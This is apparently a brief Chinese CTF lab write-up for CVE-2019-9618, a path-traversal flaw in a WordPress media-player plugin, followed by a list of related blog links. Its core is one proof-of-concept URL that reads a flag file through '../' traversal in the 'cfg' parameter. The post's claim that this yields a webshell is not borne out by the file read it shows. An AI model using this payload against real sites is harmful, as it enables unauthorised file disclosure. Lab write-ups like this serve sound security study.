春秋云境CVE-2019-9618

1.阅读靶场介绍

没有任何思路

但是以往的wordpress会出现这个玩法可以试试

话不多说,进入正题

2.启动靶场

如下图所示

3.poc

直接在路径拼接上

https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../flag

到此就可以完成webshell了

感谢您宝贵的时间

相关推荐
酿情师2 小时前
Shiro 反序列化漏洞原理(小白零基础详解)
java·web安全·网络安全
深度安全实验室2 小时前
安全工具-Frida
安全
wanhengidc2 小时前
流量清洗的作用是什么?
运维·服务器·网络·安全·web安全·智能手机
科技风向标go3 小时前
2026监控摄像头TOP10权威发布;格行视精灵、小米、萤石、海康、360怎么选?TOP10品牌优缺点一句话总结
网络·安全·监控·户外安防
vortex53 小时前
基于开发关键词的子域名Fuzz方法
网络安全
一名优秀的码农4 小时前
vulhub系列-46-dGears of War: EP#1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
jerryinwuhan4 小时前
网络安全相关制度
网络·安全·web安全
竹之却4 小时前
【Agent-阿程】OpenClaw 版本更新v2026.4.14
网络·安全·openclaw
网络安全许木4 小时前
自学渗透测试第16天(Linux文本处理进阶)
linux·运维·服务器·网络安全·渗透测试